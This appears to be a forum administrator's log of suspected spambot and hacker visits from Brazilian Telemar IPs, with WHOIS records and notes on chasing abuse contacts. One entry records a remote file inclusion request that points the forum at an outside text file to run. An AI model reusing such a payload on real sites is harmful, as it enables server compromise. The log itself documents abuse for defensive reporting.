continuando...
[
Automated XRumer spambot infested Brazil open proxy IP 200.97.128.6209:30 PM Guest Viewing Thread
200.97.128.62
Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.
IP Location: Brazil Manaus Comite Gestor Da Internet No Brasil
inetnum: 200.97/16
aut-num: AS7738
abuse-c: CGR13
owner: Telemar Norte Leste S.A.
ownerid: 033.000.118/0001-79
responsible: Daniel Advogados
country: BR
owner-c: HAOGO
tech-c: CGR13
inetrev: 200.97.128/24
nserver: ns4.telemar.net.br
nsstat: 20120202 AA
nslastaa: 20120202
nserver: ns2.telemar.net.br
nsstat: 20120202 AA
nslastaa: 20120202
created: 20030403
changed: 20110610
nic-hdl-br: CGR13
person: Centro de Gerencia de Rede TELEMAR
e-mail:
created: 20000605
changed: 20091103
nic-hdl-br: HAOGO
person: Halliny Oliveira Gomes
e-mail:
created: 20060628
changed: 20110706
]
[
[size=200]RFI hackerbot running URL variable attack command line on IP 187.40.193.165[/size]09:58 AM Guest Viewing Thread
187.40.193.165
Mozilla/3.0 (compatible; Indy Library)
/showthread.php?p=http://www.amsterdam-enlinea.com/index.txt?
IP Location: Brazil Natal Comite Gestor Da Internet No Brasil
Resolve Host: 18740193165.user.veloxzone.com.br
inetnum: 187.40/14
aut-num: AS7738
abuse-c: CGR13
owner: Tele Norte Leste Participações S.A.
ownerid: 002.558.134/0001-58
responsible: Ângelo Coelho
country: BR
owner-c: HAOGO
tech-c: CGR13
inetrev: 187.40/16
nserver: ns11.telemar.net.br
nsstat: 20110106 TIMEOUT
nslastaa: 20100709
nserver: ns10.telemar.net.br
nsstat: 20110106 AA
nslastaa: 20110106
created: 20090115
changed: 20090430
nic-hdl-br: CGR13
person: Centro de Gerencia de Rede TELEMAR
e-mail:
created: 20000605
changed: 20091103
nic-hdl-br: HAOGO
person: Halliny Oliveira Gomes
e-mail:
created: 20060628
changed: 20100614
]
[
Hacker and automated spambot infested open proxy IP 200.223.166.2912:38 AM Cherniykoldun Replying to Thread
200.223.166.29
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
IP Location: Brazil Comite Gestor Da Internet No Brasil
IP Address: 200.223.166.29
inetnum: 200.223/16
aut-num: AS7738
abuse-c: CGR13
owner: Tele Norte Leste Participações S.A.
ownerid: 002.558.134/0001-58
responsible: Ângelo Coelho
country: BR
owner-c: HAOGO
tech-c: CGR13
inetrev: 200.223.166/24
nserver: ns2.telemar.net.br
nsstat: 20100823 AA
nslastaa: 20100823
nserver: ns4.telemar.net.br
nsstat: 20100823 AA
nslastaa: 20100823
created: 19991117
changed: 20010115
nic-hdl-br: CGR13
person: Centro de Gerencia de Rede TELEMAR
e-mail:
created: 20000605
changed: 20091103
nic-hdl-br: HAOGO
person: Halliny Oliveira Gomes
e-mail:
created: 20060628
changed: 20100614
]
[
inetnum: 201.19/16
aut-num: AS7738
abuse-c: CGR13
owner: Telemar Norte Leste S.A.
ownerid: 002.558.134/0001-58
responsible: Marlemar Telgon
address: Rua Humberto de Campos, 425, 7� andar
address: 22430-190 - Rio de Janeiro - RJ
phone: (021) 31311343 []
owner-c: HAOGO
tech-c: CGR13
inetrev: 201.19.0/24
nserver: ns4.telemar.net.br
...
No useful information - so I pinged the nameserver ns4.telemar.net and got an IP of 200.222.0.35, then did
a whois on it.
nic-hdl-br: CGR13
person: Centro de Gerencia de Rede TELEMAR
e-mail: abuse@telemar.net.br
created: 20000605
changed: 20060927
nic-hdl-br: HAOGO
person: Halliny Oliveira Gomes
e-mail: halliny.gomes@telemar.com.br
created: 20060628
changed: 20060717
remarks: Security issues should also be addressed to
remarks: cert@cert.br, http://www.cert.br/
remarks: Mail abuse issues should also be addressed to
remarks: mail-abuse@cert.br
I am suspicious of this so I looked up cert.br. Over the last week I have had to continually notify them of their mis-users, and that gives me pause...
I did a nslookup on 201.19.19.67 and found the reverse entry for 67.19.19.201.in-addr.arpa name = 20119019067.user.veloxzone.com.br so I looked up veloxzone.com.br 200.223.8.81
nic-hdl-br: CGR13
person: Centro de Gerencia de Rede TELEMAR
e-mail: abuse@telemar.net.br
created: 20000605
changed: 20060927
nic-hdl-br: HAOGO
person: Halliny Oliveira Gomes
e-mail: halliny.gomes@telemar.com.br
created: 20060628
changed: 20060717
remarks: Security issues should also be addressed to
remarks: cert@cert.br, http://www.cert.br/
remarks: Mail abuse issues should also be addressed to
remarks: mail-abuse@cert.br
These folks must all be inbreeders...
OK I am sick of this... I am going directly to the source 200.0.0.0 (Lacnic themselves).
abuse@lacnic.net
]